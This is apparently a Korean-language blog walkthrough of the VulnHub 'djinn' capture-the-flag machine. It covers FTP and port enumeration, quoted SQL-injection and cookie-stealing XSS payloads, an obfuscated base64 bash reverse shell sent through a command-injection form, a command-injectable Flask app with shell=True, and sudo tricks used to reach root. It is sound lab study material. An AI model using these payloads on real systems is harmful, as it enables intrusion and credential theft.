INFO
Name : djinn
Entry : 13 / 35
Level: Beginner-Intermediate
VulnHub URL : https://www.vulnhub.com/entry/djinn-1,397/
Description : The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used VirtualBox this time.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
: netdiscover
2. SCANNING
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.10.10
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.10.31 1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-31 21:58 KST
Nmap scan report for 192.168.10.31
Host is up (0.00014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
: hidden port 1337 / 7331
2-1. FTP ANONYMOUS LOGIN
┌──(root💀takudaddy)-[~]
└─# ftp 192.168.10.31
Connected to 192.168.10.31.
220 (vsFTPd 3.0.3)
Name (192.168.10.31:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> lcd /study
Local directory now /study
ftp> mget *
mget creds.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (11.2838 kB/s)
mget game.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.00 secs (115.2074 kB/s)
mget message.txt?
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (110.4620 kB/s)
ftp> quit
221 Goodbye.
┌──(root💀takudaddy)-[/study]
└─# cat creds.txt
nitu:81299
┌──(root💀takudaddy)-[/study]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
┌──(root💀takudaddy)-[/study]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
3. WEB ENUMERATION
curl
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.31:1337
curl: (1) Received HTTP/0.9 when not allowed
┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.10.31:7331
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Lost in space</title>
<!-- Bootstrap core CSS -->
<!-- <link href="../../dist/css/bootstrap.min.css" rel="stylesheet"> -->
<!-- Custom styles for this template -->
<link href="../static/css/cover.css" rel="stylesheet">
</head>
<body>
<div class="site-wrapper">
<div class="site-wrapper-inner">
<div class="cover-container">
<div class="masthead clearfix">
<div class="inner">
<h3 class="masthead-brand">mzfr</h3>
<nav class="nav nav-masthead">
<a class="nav-link" href="#">Home</a>
<a class="nav-link" href="#">Features</a>
<a class="nav-link" href="#">Contact</a>
</nav>
</div>
</div>
<div class="inner cover">
<h1 class="cover-heading">Let's see how good your are.</h1>
</div>
<div class="mastfoot">
<div class="inner">
<p>Cover template for <a href="https://getbootstrap.com">Bootstrap</a>, by <a href="https://twitter.com/mdo">@mdo</a>.</p>
</div>
</div>
</div>
</div>
</div>
<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://code.jquery.com/jquery-3.1.1.slim.min.js" integrity="sha384-A7FZj7v+d/sdmMqp/nOQwliLvUsJfDHW+k9Omg/a/EheAdgtzNs3hpfag6Ed950n" crossorigin="anonymous"></script>
<!-- <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery.min.js"><\/script>')</script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.0/js/tether.min.js" integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"></script>
<!-- <script src="../../dist/js/bootstrap.min.js"></script> -->
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<!-- <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script> -->
</body>
</html>
:1337
: 새로 고침 할 때마다 숫자와 산술식이 바뀐다.
┌──(root💀takudaddy)-[/study]
└─# nc 192.168.10.31 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(1, '-', 1)
> 0
(3, '+', 9)
> 12
(6, '+', 6)
> 12
(4, '+', 5)
> 9
(4, '+', 7)
> 11
(9, '/', 4)
> ^C
┌──(root💀takudaddy)-[/study]
└─# 1 ⨯
:7331
mzfr
bootstrap?
┌──(root💀takudaddy)-[~]
└─# searchsploit bootstrap
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
Bootstrapy CMS - Multiple SQL Injection | php/webapps/46590.txt
e107 2 Bootstrap CMS - Cross-Site Scripting | php/webapps/35679.txt
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/study]
└─# searchsploit -m php/webapps/46590.txt
Exploit: Bootstrapy CMS - Multiple SQL Injection
URL: https://www.exploit-db.com/exploits/46590
Path: /usr/share/exploitdb/exploits/php/webapps/46590.txt
File Type: UTF-8 Unicode text, with CRLF line terminators
Copied to: /study/46590.txt
┌──(root💀takudaddy)-[/study]
└─# cat 46590.txt
# Exploit Title: Bootstrapy CMS - Multiple SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://bootstrapy.com
# Demo Site: http://bootstrapy.net/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/modules/forums/forum-thread.php
Vulnerable Parameter: thread_id (POST)
Attack Patten:
search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/modules/pages/contact-submit.php
Vulnerable Parameter: subject (POST)
Attack Pattern:
email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=
----- PoC 3 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: post-id
Attack Pattern:
body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z"e=1&submit=&thread-id=1
----- PoC 4 - SQLi -----
Request: http://localhost/[PATH]/modules/forums/post-new-submit.php
Vulnerable Parameter: thread-id (POST)
Attack Pattern:
quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z
┌──(root💀takudaddy)-[/study]
└─# searchsploit -m php/webapps/35679.txt
Exploit: e107 2 Bootstrap CMS - Cross-Site Scripting
URL: https://www.exploit-db.com/exploits/35679
Path: /usr/share/exploitdb/exploits/php/webapps/35679.txt
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /study/35679.txt
┌──(root💀takudaddy)-[/study]
└─# cat 35679.txt
_____ _____ ______
| _ | | _ ||___ /
| |/' |_ __| |_| | / /
| /| \ \/ /\____ | / /
\ |_/ /> < .___/ /./ /
\___//_/\_\\____/ \_/
by bl4ck s3c
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
# Vulnerability Description:
CMS user details section is vulnerable to XSS. You can run XSS payloads.
XSS Vulnerability #1:
Go Update user settings page
"http://{target-url}/usersettings.php"
Set Real Name value;
"><script>alert(String.fromCharCode(88, 83, 83))</script>
or
"><script>alert(document.cookie)</script>
========
Credits:
========
Vulnerability found and advisory written by Ahmet Agar.
===========
References:
===========
http://www.0x97.info
htts://twitter.com/_HacKingZ_
:7331 enumeration
# gobuster dir -u http://192.168.10.31:7331 -w /usr/share/wordlists/dirb/big.txt
┌──(root💀takudaddy)-[/study]
└─# gobuster dir -u http://192.168.10.31:7331 -w /usr/share/wordlists/dirb/big.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.10.31:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/03/31 23:11:53 Starting gobuster in directory enumeration mode
===============================================================
/genie (Status: 200) [Size: 1676]
/wish (Status: 200) [Size: 385]
===============================================================
2021/03/31 23:13:51 Finished
===============================================================
명령어 입력하면 url과 화면상에 출력됨 :
4. EXPLOITATION
nc 시도 : 실패
php 리버스 쉘 업로드 실패
python 리버스 쉘 코드 실행 실패
헌데 문구를 자세히 살펴보면
권한이 없다던가 등의 에러 문구가 아니라
문자의 형태 선택이 잘못되었단다.
명령어를 다른 방법으로 인코딩해 넣어본다.
일단 url 인코딩은 자동으로 되는데 안되는 걸 보니
다른 형식의 인코딩이 필요할 듯
nc -e 192.168.10.10 7979를
https://www.base64encode.org/에서 인코딩 했다.
bmMgLWUgMTkyLjE2OC4xMC4xMCA3OTc5Cg==
위 상태로 넣었는데 실패!
하지만 base64 형식이 맞는 것 같다.
명령어를 다른 형식으로 전환
bash -i >& /dev/tcp/192.168.10.10/7979 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ==
echo로 출력한 뒤 파이프로 넘겨
base64로 디코딩 > bash 실행
리스너를 기동시켜 주고
완성된 명령어를 입력하면
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ== | base64 -d | bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc5NzkgMD4mMQ==" | base64 -d | bash
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979 1 ⨯
listening on [any] 7979 ...
192.168.10.31: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.31] 43436
bash: cannot set terminal process group (679): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$
접속 성공!
5. POST EXPLOITATION
www-data@djinn:/opt/80$ ls -al
ls -al
total 24
drwxr-xr-x 4 www-data www-data 4096 Nov 17 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw-r--r-- 1 www-data www-data 1323 Nov 13 2019 app.py
-rw-r--r-- 1 www-data www-data 1846 Nov 14 2019 app.pyc
drwxr-xr-x 5 www-data www-data 4096 Nov 13 2019 static
drwxr-xr-x 2 www-data www-data 4096 Nov 14 2019 templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
def validate(cmd):
if CREDS in cmd and "cat" not in cmd:
return True
try:
for i in RCE:
for j in cmd:
if i == j:
return False
return True
except Exception:
return False
@app.route("/", methods=["GET"])
def index():
return render_template("main.html")
@app.route("/wish", methods=['POST', "GET"])
def wish():
execute = request.form.get("cmd")
if execute:
if validate(execute):
output = subprocess.Popen(execute, shell=True,
stdout=subprocess.PIPE).stdout.read()
else:
output = "Wrong choice of words"
return redirect(url_for("genie", name=output))
else:
return render_template('wish.html')
@app.route('/genie', methods=['GET', 'POST'])
def genie():
if 'name' in request.args:
page = request.args.get('name')
else:
page = "It's not that hard"
return render_template('genie.html', file=page)
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
www-data@djinn:/opt/80$
CREDS = "/home/nitish/.dev/creds.txt"
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish/.dev$
nitish : p4ssw0rdStr3r0n9
NITISH
니티쉬로 전환해보자
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
su: must be run from a terminal
안된단다.
www-data@djinn:/opt/80$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
같은 종류의 문제인데
tty 혹은 터미널을 기동시켜줘야 한다.
간단히 해결할 수 있는데
www-data@djinn:/home/nitish/.dev$ bash
bash
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@djinn:/home/nitish/.dev$
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~/.dev$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~/.dev$
위 절차로 하던가 ssh로 붙어주면 된다.
┌──(root💀takudaddy)-[/attack]
└─# ssh nitish@192.168.10.31 2 ⚙
The authenticity of host '192.168.10.31 (192.168.10.31)' can't be established.
ECDSA key fingerprint is SHA256:v2iGR6/ExHheYxy8lYISh+VaSM3sBf3DLY5MGWRpIu4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.10.31' (ECDSA) to the list of known hosts.
nitish@192.168.10.31's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-66-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Mar 31 20:41:57 IST 2021
System load: 0.0 Processes: 102
Usage of /: 38.9% of 9.78GB Users logged in: 0
Memory usage: 18% IP address for eth0: 192.168.10.31
Swap usage: 0%
* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
https://microk8s.io/high-availability
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
246 packages can be updated.
196 updates are security updates.
Last login: Thu Nov 14 20:32:20 2019 from 192.168.1.107
nitish@djinn:~$ id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ ls -al
total 32
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 130 Nov 12 2019 .bash_history
-rw-r--r-- 1 nitish nitish 3771 Nov 11 2019 .bashrc
drwx------ 2 nitish nitish 4096 Nov 11 2019 .cache
drwxr-xr-x 2 nitish nitish 4096 Oct 21 2019 .dev
drwx------ 3 nitish nitish 4096 Nov 11 2019 .gnupg
-rw-r----- 1 nitish nitish 33 Nov 12 2019 user.txt
nitish@djinn:~$ cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
nitish@djinn:~$
유저 전환 후 일단 user 플래그를 얻었고,
/usr/bin/genie를 실행시킬 수 있단다.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:/home$
사용법을 알려준다.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -h 192.168.10.10 -g -p /bin/sh -e wish
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -g wish
We've added your wish to our records.
Continue praying!!
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -p /bin/sh wish
Pass your wish to GOD, he might be able to help you.
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -e /bin/bash wish
Pass your wish to GOD, he might be able to help you.
뭐 어쩌란 말이냐?
답은
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -cmd NEW
my man!!
$ exit
You are a noob hacker!!
nitish@djinn:/home$ sudo -u sam /usr/bin/genie -cmd new
my man!!
란다..
혼자선 절대 못 풀었을 거다 ㄷㄷ
계속 가본다.
SAM
계속 가본다.
$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ bash
sam@djinn:/home$
sam@djinn:/home$ cd sam
sam@djinn:/home/sam$ ls -al
total 36
drwxr-x--- 4 sam sam 4096 Nov 14 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 417 Nov 14 2019 .bash_history
-rw-r--r-- 1 root root 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 sam sam 3771 Oct 20 2019 .bashrc
drwx------ 2 sam sam 4096 Nov 11 2019 .cache
drwx------ 3 sam sam 4096 Oct 20 2019 .gnupg
-rw-r--r-- 1 sam sam 807 Oct 20 2019 .profile
-rw-r--r-- 1 sam sam 1749 Nov 7 2019 .pyc
-rw-r--r-- 1 sam sam 0 Nov 7 2019 .sudo_as_admin_successful
sam@djinn:/home/sam$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
Working on it!!
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: 77
Better Luck next time
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: .sudo_as_admin_successful
User root is not allowed to read .sudo_as_admin_successful
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
work your ass off!!
sam@djinn:/home/sam$
뭐 어떻게 하라고?
6. PRIVILEGE ESCALATION
정답은
sam@djinn:/tmp$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# bash
root@djinn:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
정답은 2번을 고른 뒤 'num'을 입력하면
root로 전환이 된단다.
참 나.. 이런 수수께끼를 어떻게 풀어..
시험에도 이런게 나오나 설마?
(-_- ;)
암튼 루트..
root@djinn:/root# ls
lago proof.sh
root@djinn:/root# ./proof.sh
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Wed Mar 31 21:33:17 IST 2021
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 15. DerpNStink (0) | 2021.04.01 |
|---|---|
| 14. EVM (0) | 2021.04.01 |
| 12. Sar (0) | 2021.03.31 |
| 11. MisDirection (0) | 2021.03.30 |
| 10. Symfonos 5 (0) | 2021.03.29 |